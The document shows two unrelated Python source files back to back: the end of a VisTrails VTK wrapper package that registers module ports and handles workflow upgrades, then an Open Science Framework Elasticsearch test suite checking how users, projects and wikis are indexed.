'GetTotalNumberOfInputConnections',
])
def addGetPorts(module, get_list):
klass = get_description_class(module.vtkClass)
registry = get_module_registry()
for name in get_list:
if name in disallowed_get_ports:
continue
method = getattr(klass, name)
signatures = get_method_signature(method)
if len(signatures) > 1:
prune_signatures(module, name, signatures, output=True)
for ix, getter in enumerate(signatures):
if getter[1] or len(getter[0]) > 1:
continue
class_ = typeMap(getter[0][0])
if is_class_allowed(class_):
if len(signatures) > 1:
n = name + "_" + str(ix+1)
else:
n = name
registry.add_output_port(module, n, class_, True)
def addPorts(module, delayed):
""" addPorts(module: VTK module inherited from Module,
delayed: object with add_input_port slot
) -> None
Search all metamethods of module and add appropriate ports
ports that cannot be added immediately should be appended to
the delayed object that is passed. see the SetRenderWindow cases.
"""
klass = get_description_class(module.vtkClass)
registry = get_module_registry()
registry.add_output_port(module, 'self', module)
parser.parse(klass)
addAlgorithmPorts(module)
addGetPorts(module, parser.get_get_methods())
addSetGetPorts(module, parser.get_get_set_methods(), delayed)
addTogglePorts(module, parser.get_toggle_methods())
addStatePorts(module, parser.get_state_methods())
addOtherPorts(module, parser.get_other_methods())
# CVS version of VTK doesn't support AddInputConnect(vtkAlgorithmOutput)
if klass==vtk.vtkAlgorithm:
registry.add_input_port(module, 'AddInputConnection',
typeMap('vtkAlgorithmOutput'))
# vtkWriters have a custom File port
elif klass==vtk.vtkWriter:
registry.add_output_port(module, 'file',
typeMap('File','edu.utah.sci.vistrails.basic'))
elif klass==vtk.vtkImageWriter:
registry.add_output_port(module, 'file',
typeMap('File','edu.utah.sci.vistrails.basic'))
elif klass==vtk.vtkVolumeProperty:
registry.add_input_port(module, 'SetTransferFunction',
typeMap('TransferFunction'))
elif klass==vtk.vtkDataSet:
registry.add_input_port(module, 'SetPointData', typeMap('vtkPointData'))
registry.add_input_port(module, 'SetCellData', typeMap('vtkCellData'))
elif klass==vtk.vtkCell:
registry.add_input_port(module, 'SetPointIds', typeMap('vtkIdList'))
def setAllPorts(descriptor, delayed):
""" setAllPorts(descriptor: ModuleDescriptor) -> None
Traverse descriptor and all of its children/grand-children to add all ports
"""
addPorts(descriptor.module, delayed)
for child in descriptor.children:
setAllPorts(child, delayed)
def class_dict(base_module, node):
"""class_dict(base_module, node) -> dict
Returns the class dictionary for the module represented by node and
with base class base_module"""
class_dict_ = {}
def update_dict(name, callable_):
if class_dict_.has_key(name):
class_dict_[name] = callable_(class_dict_[name])
elif hasattr(base_module, name):
class_dict_[name] = callable_(getattr(base_module, name))
else:
class_dict_[name] = callable_(None)
def guarded_SimpleScalarTree_wrap_compute(old_compute):
# This builds the scalar tree and makes it cacheable
def compute(self):
self.is_cacheable = lambda *args, **kwargs: True
old_compute(self)
self.vtkInstance.BuildTree()
return compute
def guarded_SetFileName_wrap_compute(old_compute):
# This checks for the presence of file in VTK readers
def compute(self):
# Skips the check if it's a vtkImageReader or vtkPLOT3DReader, because
# it has other ways of specifying files, like SetFilePrefix for
# multiple files
if any(issubclass(self.vtkClass, x)
for x in
[vtk.vtkBYUReader,
vtk.vtkImageReader,
vtk.vtkPLOT3DReader,
vtk.vtkDICOMImageReader,
vtk.vtkTIFFReader]):
old_compute(self)
return
if self.hasInputFromPort('SetFileName'):
name = self.getInputFromPort('SetFileName')
elif self.hasInputFromPort('SetFile'):
name = self.getInputFromPort('SetFile').name
else:
raise ModuleError(self, 'Missing filename')
if not os.path.isfile(name):
raise ModuleError(self, 'File does not exist')
old_compute(self)
return compute
def compute_SetDiffuseColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetDiffuseColorWidget(self, color):
self.vtkInstance.SetDiffuseColor(color.tuple)
return call_SetDiffuseColorWidget
def compute_SetAmbientColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetAmbientColorWidget(self, color):
self.vtkInstance.SetAmbientColor(color.tuple)
return call_SetAmbientColorWidget
def compute_SetSpecularColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetSpecularColorWidget(self, color):
self.vtkInstance.SetSpecularColor(color.tuple)
return call_SetSpecularColorWidget
def compute_SetColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetColorWidget(self, color):
self.vtkInstance.SetColor(color.tuple)
return call_SetColorWidget
def compute_SetEdgeColorWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetEdgeColorWidget(self, color):
self.vtkInstance.SetEdgeColor(color.tuple)
return call_SetEdgeColorWidget
def compute_SetBackgroundWidget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackgroundWidget(self, color):
self.vtkInstance.SetBackground(color.tuple)
return call_SetBackgroundWidget
def compute_SetBackground2Widget(old_compute):
if old_compute != None:
return old_compute
def call_SetBackground2Widget(self, color):
self.vtkInstance.SetBackground2(color.tuple)
return call_SetBackground2Widget
def compute_SetVTKCell(old_compute):
if old_compute != None:
return old_compute
def call_SetRenderWindow(self, cellObj):
if cellObj.cellWidget:
self.vtkInstance.SetRenderWindow(cellObj.cellWidget.mRenWin)
return call_SetRenderWindow
def compute_SetTransferFunction(old_compute):
# This sets the transfer function
if old_compute != None:
return old_compute
def call_SetTransferFunction(self, tf):
tf.set_on_vtk_volume_property(self.vtkInstance)
return call_SetTransferFunction
def compute_SetPointData(old_compute):
if old_compute != None:
return old_compute
def call_SetPointData(self, pd):
self.vtkInstance.GetPointData().ShallowCopy(pd)
return call_SetPointData
def compute_SetCellData(old_compute):
if old_compute != None:
return old_compute
def call_SetCellData(self, cd):
self.vtkInstance.GetCellData().ShallowCopy(cd)
return call_SetCellData
def compute_SetPointIds(old_compute):
if old_compute != None:
return old_compute
def call_SetPointIds(self, point_ids):
self.vtkInstance.GetPointIds().SetNumberOfIds(point_ids.GetNumberOfIds())
for i in xrange(point_ids.GetNumberOfIds()):
self.vtkInstance.GetPointIds().SetId(i, point_ids.GetId(i))
return call_SetPointIds
def compute_CopyImportString(old_compute):
if old_compute != None:
return old_compute
def call_CopyImportVoidPointer(self, pointer):
self.vtkInstance.CopyImportVoidPointer(pointer, len(pointer))
return call_CopyImportVoidPointer
def guarded_Writer_wrap_compute(old_compute):
# The behavior for vtkWriter subclasses is to call Write()
# If the user sets a name, we will create a file with that name
# If not, we will create a temporary file from the file pool
def compute(self):
old_compute(self)
fn = self.vtkInstance.GetFileName()
if not fn:
o = self.interpreter.filePool.create_file(suffix='.vtk')
self.vtkInstance.SetFileName(o.name)
else:
o = File()
o.name = fn
self.vtkInstance.Write()
self.setResult('file', o)
return compute
for var in dir(node.klass):
# Everyone that has a Set.*FileName should have a Set.*File port too
if set_file_name_pattern.match(var):
def get_compute_SetFile(method_name):
def compute_SetFile(old_compute):
if old_compute != None:
return old_compute
def call_SetFile(self, file_obj):
getattr(self.vtkInstance, method_name)(file_obj.name)
return call_SetFile
return compute_SetFile
update_dict('_special_input_function_' + var[:-4],
get_compute_SetFile(var))
if hasattr(node.klass, 'SetFileName'):
# ... BUT we only want to check existence of filenames on
# readers. VTK is nice enough to be consistent with names, but
# this is brittle..
if node.klass.__name__.endswith('Reader'):
if not node.klass.__name__.endswith('TiffReader'):
update_dict('compute', guarded_SetFileName_wrap_compute)
if hasattr(node.klass, 'SetRenderWindow'):
update_dict('_special_input_function_SetVTKCell',
compute_SetVTKCell)
#color gui wrapping
if hasattr(node.klass, 'SetDiffuseColor'):
update_dict('_special_input_function_SetDiffuseColorWidget',
compute_SetDiffuseColorWidget)
if hasattr(node.klass, 'SetAmbientColor'):
update_dict('_special_input_function_SetAmbientColorWidget',
compute_SetAmbientColorWidget)
if hasattr(node.klass, 'SetSpecularColor'):
update_dict('_special_input_function_SetSpecularColorWidget',
compute_SetSpecularColorWidget)
if hasattr(node.klass, 'SetEdgeColor'):
update_dict('_special_input_function_SetEdgeColorWidget',
compute_SetEdgeColorWidget)
if hasattr(node.klass, 'SetColor'):
update_dict('_special_input_function_SetColorWidget',
compute_SetColorWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground')):
update_dict('_special_input_function_SetBackgroundWidget',
compute_SetBackgroundWidget)
if (issubclass(node.klass, vtk.vtkRenderer) and
hasattr(node.klass, 'SetBackground2')):
update_dict('_special_input_function_SetBackground2Widget',
compute_SetBackground2Widget)
if issubclass(node.klass, vtk.vtkWriter):
update_dict('compute', guarded_Writer_wrap_compute)
if issubclass(node.klass, vtk.vtkScalarTree):
update_dict('compute', guarded_SimpleScalarTree_wrap_compute)
if issubclass(node.klass, vtk.vtkVolumeProperty):
update_dict('_special_input_function_SetTransferFunction',
compute_SetTransferFunction)
if issubclass(node.klass, vtk.vtkDataSet):
update_dict('_special_input_function_SetPointData',
compute_SetPointData)
update_dict('_special_input_function_SetCellData',
compute_SetCellData)
if issubclass(node.klass, vtk.vtkCell):
update_dict('_special_input_function_SetPointIds',
compute_SetPointIds)
if issubclass(node.klass, vtk.vtkImageImport):
update_dict('_special_input_function_CopyImportString',
compute_CopyImportString)
return class_dict_
disallowed_modules = set([
'vtkGeoAlignedImageCache',
'vtkGeoTerrainCache',
'vtkMPIGroup'
])
def createModule(baseModule, node):
""" createModule(baseModule: a Module subclass, node: TreeNode) -> None
Construct a module inherits baseModule with specification from node
"""
if node.name in disallowed_modules: return
def obsolete_class_list():
lst = []
items = ['vtkInteractorStyleTrackball',
'vtkStructuredPointsGeometryFilter',
'vtkConstrainedPointHandleRepresentation']
def try_to_add_item(item):
try:
lst.append(getattr(vtk, item))
except AttributeError:
pass
for item in items:
try_to_add_item(item)
return lst
obsolete_list = obsolete_class_list()
def is_abstract():
"""is_abstract tries to instantiate the class. If it's
abstract, this will raise."""
# Consider obsolete classes abstract
if node.klass in obsolete_list:
return True
try:
getattr(vtk, node.name)()
except TypeError: # VTK raises type error on abstract classes
return True
return False
module = new_module(baseModule, node.name,
class_dict(baseModule, node),
docstring=getattr(vtk, node.name).__doc__
)
# This is sitting on the class
if hasattr(fix_classes, node.klass.__name__ + '_fixed'):
module.vtkClass = getattr(fix_classes, node.klass.__name__ + '_fixed')
else:
module.vtkClass = node.klass
registry = get_module_registry()
registry.add_module(module, abstract=is_abstract(),
signatureCallable=vtk_hasher)
for child in node.children:
if child.name in disallowed_classes:
continue
createModule(module, child)
def createAllModules(g):
""" createAllModules(g: ClassTree) -> None
Traverse the VTK class tree and add all modules into the module registry
"""
v = vtk.vtkVersion()
version = [v.GetVTKMajorVersion(),
v.GetVTKMinorVersion(),
v.GetVTKBuildVersion()]
if version < [5, 7, 0]:
assert len(g.tree[0]) == 1
base = g.tree[0][0]
assert base.name == 'vtkObjectBase'
vtkObjectBase = new_module(vtkBaseModule, 'vtkObjectBase')
vtkObjectBase.vtkClass = vtk.vtkObjectBase
registry = get_module_registry()
registry.add_module(vtkObjectBase)
if version < [5, 7, 0]:
for child in base.children:
if child.name in disallowed_classes:
continue
createModule(vtkObjectBase, child)
else:
for base in g.tree[0]:
for child in base.children:
if child.name in disallowed_classes:
continue
createModule(vtkObjectBase, child)
##############################################################################
# Convenience methods
def extract_vtk_instance(vistrails_obj):
"""extract_vtk_instance(vistrails_obj) -> vtk_object
takes an instance of a VisTrails module that is a subclass
of the vtkObjectBase module and returns the corresponding
instance."""
global identifier
vtkObjectBase = registry.get_descriptor_by_name(identifier,
'vtkObjectBase').module
assert isinstance(vistrails_obj, vtkObjectBase)
return vistrails_obj.vtkInstance
def wrap_vtk_instance(vtk_obj):
"""wrap_vtk_instance(vtk_object) -> VisTrails module
takes a vtk instance and returns a corresponding
wrapped instance of a VisTrails module"""
global identifier
assert isinstance(vtk_obj, vtk.vtkObjectBase)
m = registry.get_descriptor_by_name(identifier,
vtk_obj.GetClassName())
result = m.module()
result.vtkInstance = vtk_obj
return result
################################################################################
def initialize():
""" initialize() -> None
Package-entry to initialize the package
"""
# Check VTK version
v = vtk.vtkVersion()
version = [v.GetVTKMajorVersion(),
v.GetVTKMinorVersion(),
v.GetVTKBuildVersion()]
if version < [5, 0, 0]:
raise Exception("You need to upgrade your VTK install to version \
> >= 5.0.0")
inheritanceGraph = ClassTree(vtk)
inheritanceGraph.create()
# Transfer Function constant
tf_widget.initialize()
delayed = InstanceObject(add_input_port=[])
# Add VTK modules
registry = get_module_registry()
registry.add_module(vtkBaseModule)
createAllModules(inheritanceGraph)
setAllPorts(registry.get_descriptor_by_name(identifier,
'vtkObjectBase'),
delayed)
# Register the VTKCell and VTKHandler type if the spreadsheet is up
if registry.has_module('edu.utah.sci.vistrails.spreadsheet',
'SpreadsheetCell'):
import vtkhandler
import vtkcell
import vtkviewcell
vtkhandler.registerSelf()
vtkcell.registerSelf()
vtkviewcell.registerSelf()
# register offscreen rendering module
offscreen.register_self()
# Now add all "delayed" ports - see comment on addSetGetPorts
for args in delayed.add_input_port:
registry.add_input_port(*args)
# register Transfer Function adjustment
# This can't be reordered -- TransferFunction needs to go before
# vtkVolumeProperty, but vtkScaledTransferFunction needs
# to go after vtkAlgorithmOutput
getter = registry.get_descriptor_by_name
registry.add_module(tf_widget.vtkScaledTransferFunction)
registry.add_input_port(tf_widget.vtkScaledTransferFunction,
'Input', getter('edu.utah.sci.vistrails.vtk',
'vtkAlgorithmOutput').module)
registry.add_input_port(tf_widget.vtkScaledTransferFunction,
'Dataset', getter ('edu.utah.sci.vistrails.vtk',
'vtkDataObject').module)
registry.add_input_port(tf_widget.vtkScaledTransferFunction,
'Range', [Float, Float])
registry.add_input_port(tf_widget.vtkScaledTransferFunction,
'TransferFunction',
tf_widget.TransferFunctionConstant)
registry.add_output_port(tf_widget.vtkScaledTransferFunction,
'TransferFunction',
tf_widget.TransferFunctionConstant)
registry.add_output_port(tf_widget.vtkScaledTransferFunction,
'vtkPiecewiseFunction',
getter('edu.utah.sci.vistrails.vtk',
'vtkPiecewiseFunction').module)
registry.add_output_port(tf_widget.vtkScaledTransferFunction,
'vtkColorTransferFunction',
getter('edu.utah.sci.vistrails.vtk',
'vtkColorTransferFunction').module)
inspectors.initialize()
################################################################################
_remap = None
_controller = None
_pipeline = None
def _get_controller():
global _controller
return _controller
def _get_pipeline():
global _pipeline
return _pipeline
def build_remap(module_name=None):
global _remap, _controller
reg = get_module_registry()
uscore_num = re.compile(r"(.+)_(\d+)$")
def get_port_specs(descriptor, port_type):
ports = {}
for desc in reversed(reg.get_module_hierarchy(descriptor)):
ports.update(reg.module_ports(port_type, desc))
return ports
def build_remap_method(desc, port_prefix, port_num, port_type):
# for connection, need to differentiate between src and dst
if port_type == 'input':
conn_lookup = Connection._get_destination
get_port_spec = reg.get_input_port_spec
idx = 1
else:
conn_lookup = Connection._get_source
get_port_spec = reg.get_output_port_spec
idx = 0
def remap(old_conn, new_module):
create_new_connection = UpgradeWorkflowHandler.create_new_connection
port = conn_lookup(old_conn)
pipeline = _get_pipeline()
modules = [pipeline.modules[old_conn.source.moduleId],
pipeline.modules[old_conn.destination.moduleId]]
modules[idx] = new_module
ports = [old_conn.source, old_conn.destination]
for i in xrange(1, port_num):
port_name = "%s_%d" % (port_prefix, i)
port_spec = get_port_spec(modules[idx], port_name)
if port_spec.sigstring == port.signature:
ports[idx] = port_name
new_conn = create_new_connection(_get_controller(),
modules[0],
ports[0],
modules[1],
ports[1])
return [('add', new_conn)]
# if get here, just try to use _1 version?
ports[idx] = "%s_%d" % (port_prefix, 1)
new_conn = create_new_connection(_get_controller(),
modules[0],
ports[0],
modules[1],
ports[1])
return [('add', new_conn)]
return remap
def build_function_remap_method(desc, port_prefix, port_num):
f_map = {"vtkCellArray": {"InsertNextCell": 3}}
def build_function(old_function, new_function_name, new_module):
controller = _get_controller()
if len(old_function.parameters) > 0:
new_param_vals, aliases = \
zip(*[(p.strValue, p.alias)
for p in old_function.parameters])
else:
new_param_vals = []
aliases = []
new_function = controller.create_function(new_module,
new_function_name,
new_param_vals,
aliases)
return new_function
def remap(old_function, new_module):
for i in xrange(1, port_num):
port_name = "%s_%d" % (port_prefix, i)
port_spec = reg.get_input_port_spec(new_module, port_name)
old_sigstring = \
reg.expand_port_spec_string(old_function.sigstring,
basic_pkg)
if port_spec.sigstring == old_sigstring:
new_function = build_function(old_function, port_name,
new_module)
new_module.add_function(new_function)
return []
port_idx = 1
if desc.name in f_map:
if port_prefix in f_map[desc.name]:
port_idx = f_map[desc.name][port_prefix]
port_name = "%s_%d" % (port_prefix, port_idx)
new_function = build_function(old_function, port_name, new_module)
new_module.add_function(new_function)
return []
return remap
def process_ports(desc, port_type):
if port_type == 'input':
remap_dict_key = 'dst_port_remap'
else:
remap_dict_key = 'src_port_remap'
ports = get_port_specs(desc, port_type)
port_nums = {}
for port_name, port_spec in ports.iteritems():
# FIXME just start at 1 and go until don't find port (no
# need to track max)?
search_res = uscore_num.search(port_name)
if search_res:
port_prefix = search_res.group(1)
port_num = int(search_res.group(2))
if port_prefix not in port_nums:
port_nums[port_prefix] = port_num
elif port_num > port_nums[port_prefix]:
port_nums[port_prefix] = port_num
if desc.name not in _remap:
_remap[desc.name] = [(None, '0.9.3', None, dict())]
for port_prefix, port_num in port_nums.iteritems():
my_remap_dict = _remap[desc.name][0][3]
if remap_dict_key not in my_remap_dict:
my_remap_dict[remap_dict_key] = dict()
remap = build_remap_method(desc, port_prefix, port_num, port_type)
my_remap_dict[remap_dict_key][port_prefix] = remap
if port_type == 'input':
remap = build_function_remap_method(desc, port_prefix, port_num)
if 'function_remap' not in my_remap_dict:
my_remap_dict['function_remap'] = {}
my_remap_dict['function_remap'][port_prefix] = remap
pkg = reg.get_package_by_name(identifier)
if module_name is not None:
# print 'building remap for', module_name
desc = reg.get_descriptor_by_name(identifier, module_name)
process_ports(desc, 'input')
process_ports(desc, 'output')
else:
# print 'building entire remap'
# FIXME do this by descriptor first, then build the hierarchies for each
# module after that...
for desc in pkg.descriptor_list:
process_ports(desc, 'input')
process_ports(desc, 'output')
def handle_module_upgrade_request(controller, module_id, pipeline):
global _remap, _controller, _pipeline
reg = get_module_registry()
if _remap is None:
_remap = {}
_controller = controller
_pipeline = pipeline
module_name = pipeline.modules[module_id].name
if module_name not in _remap:
build_remap(module_name)
return UpgradeWorkflowHandler.remap_module(controller, module_id, pipeline,
_remap)
| |
# -*- coding: utf-8 -*-
import time
import unittest
import logging
import functools
from nose.tools import * # flake8: noqa (PEP8 asserts)
import mock
from framework.auth.core import Auth
from website import settings
import website.search.search as search
from website.search import elastic_search
from website.search.util import build_query
from website.search_migration.migrate import migrate
from website.models import Retraction
from tests.base import OsfTestCase
from tests.test_features import requires_search
from tests.factories import (
UserFactory, ProjectFactory, NodeFactory,
UnregUserFactory, UnconfirmedUserFactory,
RegistrationFactory
)
TEST_INDEX = 'test'
@requires_search
class SearchTestCase(OsfTestCase):
def tearDown(self):
super(SearchTestCase, self).tearDown()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
def setUp(self):
super(SearchTestCase, self).setUp()
elastic_search.INDEX = TEST_INDEX
settings.ELASTIC_INDEX = TEST_INDEX
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
def query(term):
results = search.search(build_query(term), index=elastic_search.INDEX)
return results
def query_user(name):
term = 'category:user AND "{}"'.format(name)
return query(term)
def retry_assertion(interval=0.3
, retries=3):
def test_wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
func(*args, **kwargs)
except AssertionError as e:
if retries:
time.sleep(interval)
retry_assertion(interval=interval, retries=retries - 1)(func)(*args, **kwargs)
else:
raise e
return wrapped
return test_wrapper
@requires_search
class TestUserUpdate(SearchTestCase):
def setUp(self):
super(TestUserUpdate, self).setUp()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
self.user = UserFactory(fullname='David Bowie')
def test_new_user(self):
# Verify that user has been added to Elastic Search
docs = query_user(self.user.fullname)['results']
assert_equal(len(docs), 1)
def test_new_user_unconfirmed(self):
user = UnconfirmedUserFactory()
docs = query_user(user.fullname)['results']
assert_equal(len(docs), 0)
token = user.get_confirmation_token(user.username)
user.confirm_email(token)
user.save()
docs = query_user(user.fullname)['results']
assert_equal(len(docs), 1)
def test_change_name(self):
# Add a user, change her name, and verify that only the new name is
# found in search.
user = UserFactory(fullname='Barry Mitchell')
fullname_original = user.fullname
user.fullname = user.fullname[::-1]
user.save()
docs_original = query_user(fullname_original)['results']
assert_equal(len(docs_original), 0)
docs_current = query_user(user.fullname)['results']
assert_equal(len(docs_current), 1)
def test_disabled_user(self):
# Test that disabled users are not in search index
user = UserFactory(fullname='Bettie Page')
user.save()
# Ensure user is in search index
assert_equal(len(query_user(user.fullname)['results']), 1)
# Disable the user
user.is_disabled = True
user.save()
# Ensure user is not in search index
assert_equal(len(query_user(user.fullname)['results']), 0)
def test_merged_user(self):
user = UserFactory(fullname='Annie Lennox')
merged_user = UserFactory(fullname='Lisa Stansfield')
user.save()
merged_user.save()
assert_equal(len(query_user(user.fullname)['results']), 1)
assert_equal(len(query_user(merged_user.fullname)['results']), 1)
user.merge_user(merged_user)
assert_equal(len(query_user(user.fullname)['results']), 1)
assert_equal(len(query_user(merged_user.fullname)['results']), 0)
def test_employment(self):
user = UserFactory(fullname='Helga Finn')
user.save()
institution = 'Finn\'s Fine Filers'
docs = query_user(institution)['results']
assert_equal(len(docs), 0)
user.jobs.append({
'institution': institution,
'title': 'The Big Finn',
})
user.save()
docs = query_user(institution)['results']
assert_equal(len(docs), 1)
def test_education(self):
user = UserFactory(fullname='Henry Johnson')
user.save()
institution = 'Henry\'s Amazing School!!!'
docs = query_user(institution)['results']
assert_equal(len(docs), 0)
user.schools.append({
'institution': institution,
'degree': 'failed all classes',
})
user.save()
docs = query_user(institution)['results']
assert_equal(len(docs), 1)
def test_name_fields(self):
names = ['Bill Nye', 'William', 'the science guy', 'Sanford', 'the Great']
user = UserFactory(fullname=names[0])
user.given_name = names[1]
user.middle_names = names[2]
user.family_name = names[3]
user.suffix = names[4]
user.save()
docs = [query_user(name)['results'] for name in names]
assert_equal(sum(map(len, docs)), len(docs)) # 1 result each
assert_true(all([user._id == doc[0]['id'] for doc in docs]))
@requires_search
class TestProject(SearchTestCase):
def setUp(self):
super(TestProject, self).setUp()
search.delete_index(elastic_search.INDEX)
search.create_index(elastic_search.INDEX)
self.user = UserFactory(fullname='John Deacon')
self.project = ProjectFactory(title='Red Special', creator=self.user)
def test_new_project_private(self):
# Verify that a private project is not present in Elastic Search.
docs = query(self.project.title)['results']
assert_equal(len(docs), 0)
def test_make_public(self):
# Make project public, and verify that it is present in Elastic
# Search.
self.project.set_privacy('public')
docs = query(self.project.title)['results']
assert_equal(len(docs), 1)
@requires_search
class TestRegistrationRetractions(SearchTestCase):
def setUp(self):
super(TestRegistrationRetractions, self).setUp()
self.user = UserFactory(usename='Doug Bogie')
self.title = 'Red Special'
self.consolidate_auth = Auth(user=self.user)
self.project = ProjectFactory(
title=self.title,
creator=self.user,
is_public=True,
)
self.registration = RegistrationFactory(
project=self.project,
title=self.title,
creator=self.user,
is_public=True,
is_registration=True
)
def test_retraction_is_searchable(self):
self.registration.retract_registration(self.user)
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 1)
@mock.patch('website.project.model.Node.archiving', mock.PropertyMock(return_value=False))
def test_pending_retraction_wiki_content_is_searchable(self):
# Add unique string to wiki
wiki_content = {'home': 'public retraction test'}
for key, value in wiki_content.items():
docs = query(value)['results']
assert_equal(len(docs), 0)
self.registration.update_node_wiki(
key, value, self.consolidate_auth,
)
# Query and ensure unique string shows up
docs = query(value)['results']
assert_equal(len(docs), 1)
# Query and ensure registration does show up
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 1)
# Retract registration
self.registration.retract_registration(self.user, '')
self.registration.save()
self.registration.reload()
# Query and ensure unique string in wiki doesn't show up
docs = query('category:registration AND "{}"'.format(wiki_content['home']))['results']
assert_equal(len(docs), 1)
# Query and ensure registration does show up
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 1)
@mock.patch('website.project.model.Node.archiving', mock.PropertyMock(return_value=False))
def test_retraction_wiki_content_is_not_searchable(self):
# Add unique string to wiki
wiki_content = {'home': 'public retraction test'}
for key, value in wiki_content.items():
docs = query(value)['results']
assert_equal(len(docs), 0)
self.registration.update_node_wiki(
key, value, self.consolidate_auth,
)
# Query and ensure unique string shows up
docs = query(value)['results']
assert_equal(len(docs), 1)
# Query and ensure registration does show up
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 1)
# Retract registration
self.registration.retract_registration(self.user, '')
self.registration.retraction.state = Retraction.APPROVED
self.registration.retraction.save()
self.registration.save()
self.registration.update_search()
# Query and ensure unique string in wiki doesn't show up
docs = query('category:registration AND "{}"'.format(wiki_content['home']))['results']
assert_equal(len(docs), 0)
# Query and ensure registration does show up
docs = query('category:registration AND ' + self.title)['results']
assert_equal(len(docs), 1)
@requires_search
class TestPublicNodes(SearchTestCase):
def setUp(self):
super(TestPublicNodes, self).setUp()
self.user = UserFactory(usename='Doug Bogie')
self.title = 'Red Special'
self.consolidate_auth = Auth(user=self.user)
self.project = ProjectFactory(
title=self.title,
creator=self.user,
is_public=True,
)
self.component = NodeFactory(
parent=self.project,
title=self.title,
creator=self.user,
is_public=True
)
self.registration = ProjectFactory(
title=self.title,
creator=self.user,
is_public=True,
is_registration=True
)
def test_make_private(self):
# Make project public, then private, and verify that it is not present
# in search.
self.project.set_privacy('private')
docs = query('category:project AND ' + self.title)['results']
assert_equal(len(docs), 0)
self.component.set_privacy('private')
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 0)
def test_public_parent_title(self):
self.project.set_title('hello & world', self.consolidate_auth)
self.project.save()
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 1)
assert_equal(docs[0]['parent_title'], 'hello & world')
assert_true(docs[0]['parent_url'])
def test_make_parent_private(self):
# Make parent of component, public, then private, and verify that the
# component still appears but doesn't link to the parent in search.
self.project.set_privacy('private')
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 1)
assert_equal(docs[0]['parent_title'], '-- private project --')
assert_false(docs[0]['parent_url'])
def test_delete_project(self):
self.component.remove_node(self.consolidate_auth)
docs = query('category:component AND ' + self.title)['results']
assert_equal(len(docs), 0)
self.project.remove_node(self.consolidate_auth)
docs = query('category:project AND ' + self.title)['results']
assert_equal(len(docs), 0)
def test_change_title(self):
title_original = self.project.title
self.project.set_title(
'Blue Ordinary', self.consolidate_auth, save=True)
docs = query('category:project AND ' + title_original)['results']
assert_equal(len(docs), 0)
docs = query('category:project AND ' + self.project.title)['results']
assert_equal(len(docs), 1)
def test_add_tags(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 0)
self.project.add_tag(tag, self.consolidate_auth, save=True)
for tag in tags:
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 1)
def test_remove_tag(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
self.project.add_tag(tag, self.consolidate_auth, save=True)
self.project.remove_tag(tag, self.consolidate_auth, save=True)
docs = query('tags:"{}"'.format(tag))['results']
assert_equal(len(docs), 0)
def test_update_wiki(self):
"""Add text to a wiki page, then verify that project is found when
searching for wiki text.
"""
wiki_content = {
'home': 'Hammer to fall',
'swag': '#YOLO'
}
for key, value in wiki_content.items():
docs = query(value)['results']
assert_equal(len(docs), 0)
self.project.update_node_wiki(
key, value, self.consolidate_auth,
)
docs = query(value)['results']
assert_equal(len(docs), 1)
def test_clear_wiki(self):
# Add wiki text to page, then delete, then verify that project is not
# found when searching for wiki text.
wiki_content = 'Hammer to fall'
self.project.update_node_wiki(
'home', wiki_content, self.consolidate_auth,
)
self.project.update_node_wiki('home', '', self.consolidate_auth)
docs = query(wiki_content)['results']
assert_equal(len(docs), 0)
def test_add_contributor(self):
# Add a contributor, then verify that project is found when searching
# for contributor.
user2 = UserFactory(fullname='Adam Lambert')
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
self.project.add_contributor(user2, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 1)
def test_remove_contributor(self):
# Add and remove a contributor, then verify that project is not found
# when searching for contributor.
user2 = UserFactory(fullname='Brian May')
self.project.add_contributor(user2, save=True)
self.project.remove_contributor(user2, self.consolidate_auth)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
def test_hide_contributor(self):
user2 = UserFactory(fullname='Brian May')
self.project.add_contributor(user2)
self.project.set_visible(user2, False, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 0)
self.project.set_visible(user2, True, save=True)
docs = query('category:project AND "{}"'.format(user2.fullname))['results']
assert_equal(len(docs), 1)
def test_wrong_order_search(self):
title_parts = self.title.split(' ')
title_parts.reverse()
title_search = ' '.join(title_parts)
docs = query(title_search)['results']
assert_equal(len(docs), 3)
def test_tag_aggregation(self):
tags = ['stonecoldcrazy', 'just a poor boy', 'from-a-poor-family']
for tag in tags:
self.project.add_tag(tag, self.consolidate_auth, save=True)
docs = query(self.title)['tags']
assert len(docs) == 3
for doc in docs:
assert doc['key'] in tags
@requires_search
class TestAddContributor(SearchTestCase):
# Tests of the search.search_contributor method
def setUp(self):
super(TestAddContributor, self).setUp()
self.name1 = 'Roger1 Taylor1'
self.name2 = 'John2 Deacon2'
self.name3 = u'j\xc3\xb3ebert3 Smith3'
self.name4 = u'B\xc3\xb3bbert4 Jones4'
self.user = UserFactory(fullname=self.name1)
self.user3 = UserFactory(fullname=self.name3)
def test_unreg_users_dont_show_in_search(self):
unreg = UnregUserFactory()
contribs = search.search_contributor(unreg.fullname)
assert_equal(len(contribs['users']), 0)
